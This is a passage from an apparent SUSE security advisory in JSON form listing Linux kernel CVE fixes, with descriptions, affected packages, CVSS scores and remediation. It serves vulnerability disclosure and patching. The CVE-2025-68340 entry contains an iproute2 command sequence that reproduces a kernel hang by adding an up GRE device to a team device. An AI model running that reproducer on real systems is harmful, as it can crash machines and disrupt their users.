"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68337",
"url": "https://www.suse.com/security/cve/CVE-2025-68337"
},
{
"category": "external",
"summary": "SUSE Bug 1255482 for CVE-2025-68337",
"url": "https://bugzilla.suse.com/1255482"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68337"
},
{
"cve": "CVE-2025-68339",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68339"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\natm/fore200e: Fix possible data race in fore200e_open()\n\nProtect access to fore200e-\u003eavailable_cell_rate with rate_mtx lock in the\nerror handling path of fore200e_open() to prevent a data race.\n\nThe field fore200e-\u003eavailable_cell_rate is a shared resource used to track\navailable bandwidth. It is concurrently accessed by fore200e_open(),\nfore200e_close(), and fore200e_change_qos().\n\nIn fore200e_open(), the lock rate_mtx is correctly held when subtracting\nvcc-\u003eqos.txtp.max_pcr from available_cell_rate to reserve bandwidth.\nHowever, if the subsequent call to fore200e_activate_vcin() fails, the\nfunction restores the reserved bandwidth by adding back to\navailable_cell_rate without holding the lock.\n\nThis introduces a race condition because available_cell_rate is a global\ndevice resource shared across all VCCs. If the error path in\nfore200e_open() executes concurrently with operations like\nfore200e_close() or fore200e_change_qos() on other VCCs, a\nread-modify-write race occurs.\n\nSpecifically, the error path reads the rate without the lock. If another\nCPU acquires the lock and modifies the rate (e.g., releasing bandwidth in\nfore200e_close()) between this read and the subsequent write, the error\npath will overwrite the concurrent update with a stale value. This results\nin incorrect bandwidth accounting.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68339",
"url": "https://www.suse.com/security/cve/CVE-2025-68339"
},
{
"category": "external",
"summary": "SUSE Bug 1255505 for CVE-2025-68339",
"url": "https://bugzilla.suse.com/1255505"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68339"
},
{
"cve": "CVE-2025-68340",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68340"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: Move team device type change at the end of team_port_add\n\nAttempting to add a port device that is already up will expectedly fail,\nbut not before modifying the team device header_ops.\n\nIn the case of the syzbot reproducer the gre0 device is\nalready in state UP when it attempts to add it as a\nport device of team0, this fails but before that\nheader_ops-\u003ecreate of team0 is changed from eth_header to ipgre_header\nin the call to team_dev_type_check_change.\n\nLater when we end up in ipgre_header() struct ip_tunnel* points to nonsense\nas the private data of the device still holds a struct team.\n\nExample sequence of iproute2 commands to reproduce the hang/BUG():\nip link add dev team0 type team\nip link add dev gre0 type gre\nip link set dev gre0 up\nip link set dev gre0 master team0\nip link set dev team0 up\nping -I team0 1.1.1.1\n\nMove team_dev_type_check_change down where all other checks have passed\nas it changes the dev type with no way to restore it in case\none of the checks that follow it fail.\n\nAlso make sure to preserve the origial mtu assignment:\n - If port_dev is not the same type as dev, dev takes mtu from port_dev\n - If port_dev is the same type as dev, port_dev takes mtu from dev\n\nThis is done by adding a conditional before the call to dev_set_mtu\nto prevent it from assigning port_dev-\u003emtu = dev-\u003emtu and instead\nletting team_dev_type_check_change assign dev-\u003emtu = port_dev-\u003emtu.\nThe conditional is needed because the patch moves the call to\nteam_dev_type_check_change past dev_set_mtu.\n\nTesting:\n - team device driver in-tree selftests\n - Add/remove various devices as slaves of team device\n - syzbot",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68340",
"url": "https://www.suse.com/security/cve/CVE-2025-68340"
},
{
"category": "external",
"summary": "SUSE Bug 1255507 for CVE-2025-68340",
"url": "https://bugzilla.suse.com/1255507"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68340"
},
{
"cve": "CVE-2025-68345",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68345"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda: cs35l41: Fix NULL pointer dereference in cs35l41_hda_read_acpi()\n\nThe acpi_get_first_physical_node() function can return NULL, in which\ncase the get_device() function also returns NULL, but this value is\nthen dereferenced without checking,so add a check to prevent a crash.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68345",
"url": "https://www.suse.com/security/cve/CVE-2025-68345"
},
{
"category": "external",
"summary": "SUSE Bug 1255601 for CVE-2025-68345",
"url": "https://bugzilla.suse.com/1255601"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68345"
},
{
"cve": "CVE-2025-68346",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68346"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: dice: fix buffer overflow in detect_stream_formats()\n\nThe function detect_stream_formats() reads the stream_count value directly\nfrom a FireWire device without validating it. This can lead to\nout-of-bounds writes when a malicious device provides a stream_count value\ngreater than MAX_STREAMS.\n\nFix by applying the same validation to both TX and RX stream counts in\ndetect_stream_formats().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68346",
"url": "https://www.suse.com/security/cve/CVE-2025-68346"
},
{
"category": "external",
"summary": "SUSE Bug 1255603 for CVE-2025-68346",
"url": "https://bugzilla.suse.com/1255603"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68346"
},
{
"cve": "CVE-2025-68347",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68347"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: firewire-motu: fix buffer overflow in hwdep read for DSP events\n\nThe DSP event handling code in hwdep_read() could write more bytes to\nthe user buffer than requested, when a user provides a buffer smaller\nthan the event header size (8 bytes).\n\nFix by using min_t() to clamp the copy size, This ensures we never copy\nmore than the user requested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68347",
"url": "https://www.suse.com/security/cve/CVE-2025-68347"
},
{
"category": "external",
"summary": "SUSE Bug 1255706 for CVE-2025-68347",
"url": "https://bugzilla.suse.com/1255706"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68347"
},
{
"cve": "CVE-2025-68349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68349"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid\n\nFixes a crash when layout is null during this call stack:\n\nwrite_inode\n -\u003e nfs4_write_inode\n -\u003e pnfs_layoutcommit_inode\n\npnfs_set_layoutcommit relies on the lseg refcount to keep the layout\naround. Need to clear NFS_INO_LAYOUTCOMMIT otherwise we might attempt\nto reference a null layout.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68349",
"url": "https://www.suse.com/security/cve/CVE-2025-68349"
},
{
"category": "external",
"summary": "SUSE Bug 1255544 for CVE-2025-68349",
"url": "https://bugzilla.suse.com/1255544"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68349"
},
{
"cve": "CVE-2025-68351",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68351"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: fix refcount leak in exfat_find\n\nFix refcount leaks in `exfat_find` related to `exfat_get_dentry_set`.\n\nFunction `exfat_get_dentry_set` would increase the reference counter of\n`es-\u003ebh` on success. Therefore, `exfat_put_dentry_set` must be called\nafter `exfat_get_dentry_set` to ensure refcount consistency. This patch\nrelocate two checks to avoid possible leaks.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
